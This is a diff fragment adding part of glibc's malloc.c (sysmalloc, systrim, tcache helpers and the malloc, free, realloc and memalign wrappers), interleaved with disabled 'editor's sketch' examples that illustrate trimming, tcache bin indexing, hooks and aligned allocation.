+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT.
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if the first call releases less than we asked,
+         or if failure somehow altered the brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
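+
+/* [Editor's sketch]  systrim is normally reached through free() or the
+   public malloc_trim() mentioned above.  A minimal user-level illustration;
+   the sizes are arbitrary, chosen so the 1 KiB blocks stay below the mmap
+   threshold and are carved from the sbrk'd main arena:  */
+#if 0   /* illustrative only, not part of glibc */
+#include <malloc.h>
+#include <stdlib.h>
+
+int
+main (void)
+{
+  enum { N = 1 << 16 };                 /* 64 MiB of 1 KiB blocks */
+  static char *blocks[N];
+
+  for (int i = 0; i < N; i++)
+    blocks[i] = malloc (1024);
+
+  /* Freeing them grows av->top; free() may already call systrim once the
+     trim threshold is exceeded.  */
+  for (int i = 0; i < N; i++)
+    free (blocks[i]);
+
+  /* malloc_trim (0) asks the allocator to hand back as much of the top
+     chunk as possible; it returns 1 if any memory was released.  */
+  return malloc_trim (0) ? 0 : 1;
+}
+#endif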
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compiler's job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (at the moment, at least) so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time); this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  char counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
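+
+/* [Editor's sketch]  How a request size maps onto one of the bins above.
+   The arithmetic below re-derives the usual x86-64 glibc 2.27 values
+   (SIZE_SZ 8, MALLOC_ALIGNMENT 16, MINSIZE 32, 64 tcache bins); the DEMO_*
+   names and helpers are illustrative, not glibc's own macros.  */
+#if 0   /* illustrative only, not part of glibc */
+#include <stdio.h>
+#include <stddef.h>
+
+#define DEMO_SIZE_SZ      8
+#define DEMO_ALIGN        16
+#define DEMO_MINSIZE      32
+#define DEMO_TCACHE_BINS  64
+
+/* Pad a request up to a chunk size, then map that chunk size to a bin.  */
+static size_t
+demo_request2size (size_t req)
+{
+  size_t s = (req + DEMO_SIZE_SZ + DEMO_ALIGN - 1) & ~(size_t) (DEMO_ALIGN - 1);
+  return s < DEMO_MINSIZE ? DEMO_MINSIZE : s;
+}
+
+static size_t
+demo_csize2tidx (size_t csize)
+{
+  return (csize - DEMO_MINSIZE + DEMO_ALIGN - 1) / DEMO_ALIGN;
+}
+
+int
+main (void)
+{
+  /* 24 -> chunk 0x20 -> bin 0; 1032 -> chunk 0x410 -> bin 63 (the last
+     tcache bin); 1033 -> chunk 0x420 -> index 64, beyond the tcache.  */
+  size_t reqs[] = { 24, 1032, 1033 };
+  for (int i = 0; i < 3; i++)
+    {
+      size_t cs = demo_request2size (reqs[i]);
+      size_t idx = demo_csize2tidx (cs);
+      printf ("request %4zu -> chunk 0x%zx -> tidx %zu%s\n",
+              reqs[i], cs, idx,
+              idx < DEMO_TCACHE_BINS ? "" : " (not tcached)");
+    }
+  return 0;
+}
+#endif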
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+  assert (tc_idx < TCACHE_MAX_BINS);
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there are
+   chunks available to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  assert (tc_idx < TCACHE_MAX_BINS);
+  assert (tcache->entries[tc_idx] > 0);
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  return (void *) e;
+}
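+
+/* [Editor's sketch]  tcache_put/tcache_get above make each tcache bin a
+   simple LIFO stack keyed by chunk size.  On a tcache-enabled glibc
+   (2.26 and later) this is directly observable from user code:  */
+#if 0   /* illustrative only, not part of glibc */
+#include <stdio.h>
+#include <stdlib.h>
+
+int
+main (void)
+{
+  void *a = malloc (0x48);      /* tcache-sized request */
+  void *b = malloc (0x48);
+
+  free (a);
+  free (b);                     /* the bin now holds: b -> a (LIFO) */
+
+  void *c = malloc (0x48);      /* tcache_get pops b first ...  */
+  void *d = malloc (0x48);      /* ... then a                   */
+
+  printf ("a=%p b=%p c=%p d=%p\n", a, b, c, d);   /* expect c==b, d==a */
+  return 0;
+}
+#endif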
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, so be careful not to pad twice.  */
+  size_t tbytes;
+  checked_request2size (bytes, tbytes);
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+      && tcache
+      && tcache->entries[tc_idx] != NULL)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
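+
+/* [Editor's sketch]  As the code above shows, __libc_malloc consults
+   __malloc_hook before doing anything else, which is why that pointer is
+   such a classic heap-exploitation target.  Its legitimate use (deprecated,
+   but still honoured in glibc 2.27) looks roughly like this; the hook name
+   is made up:  */
+#if 0   /* illustrative only, not part of glibc */
+#include <malloc.h>
+#include <stdio.h>
+
+static void *(*old_malloc_hook) (size_t, const void *);
+
+static void *
+logging_malloc_hook (size_t size, const void *caller)
+{
+  void *result;
+
+  /* Restore the previous hook so the malloc call below is not
+     intercepted recursively.  */
+  __malloc_hook = old_malloc_hook;
+  result = malloc (size);
+  fprintf (stderr, "malloc (%zu) from %p -> %p\n", size, caller, result);
+  old_malloc_hook = __malloc_hook;
+  __malloc_hook = logging_malloc_hook;
+  return result;
+}
+
+int
+main (void)
+{
+  old_malloc_hook = __malloc_hook;
+  __malloc_hook = logging_malloc_hook;
+
+  void *p = malloc (32);        /* routed through the hook */
+  free (p);
+  return 0;
+}
+#endif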
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
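+
+/* [Editor's sketch]  The mmap branch above implements the dynamic mmap
+   threshold: freeing an mmapped chunk larger than the current threshold
+   raises the threshold (and doubles the trim threshold), so similar
+   requests are served from the heap next time.  Setting the threshold
+   explicitly with mallopt() pins it (mp_.no_dyn_threshold):  */
+#if 0   /* illustrative only, not part of glibc */
+#include <malloc.h>
+#include <stdlib.h>
+
+int
+main (void)
+{
+  /* Requests of 128 KiB and up should always go through mmap.  */
+  mallopt (M_MMAP_THRESHOLD, 128 * 1024);
+
+  void *big = malloc (256 * 1024);  /* served by mmap */
+  free (big);                       /* munmap_chunk(); threshold unchanged */
+  return 0;
+}
+#endif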
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wraps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
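+
+/* [Editor's sketch]  Since aligned_alloc is a weak alias for
+   __libc_memalign (above), such requests reach _mid_memalign, which relays
+   to plain malloc when the alignment is no stricter than MALLOC_ALIGNMENT
+   (16 on x86-64, an assumption here) and otherwise rounds any
+   non-power-of-two alignment up before calling _int_memalign:  */
+#if 0   /* illustrative only, not part of glibc */
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+int
+main (void)
+{
+  /* Alignment 8 <= MALLOC_ALIGNMENT, so this is ordinary malloc.  */
+  void *a = aligned_alloc (8, 64);
+
+  /* Alignment 256 > MALLOC_ALIGNMENT: _int_memalign places the chunk.  */
+  void *b = aligned_alloc (256, 512);
+
+  printf ("a=%p (a %% 256 = %zu)  b=%p (b %% 256 = %zu)\n",
+          a, (size_t) ((uintptr_t) a % 256),
+          b, (size_t) ((uintptr_t) b % 256));     /* b % 256 == 0 */
+  free (a);
+  free (b);
+  return 0;
+}
+#endif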
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
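+
+/* [Editor's note]  Worked example, assuming a 4 KiB page: valloc (100)
+   behaves like memalign (4096, 100), whereas pvalloc (100) also rounds the
+   request itself up, ALIGN_UP (100, 4096) == 4096, i.e. it behaves like
+   memalign (4096, 4096).  */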
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
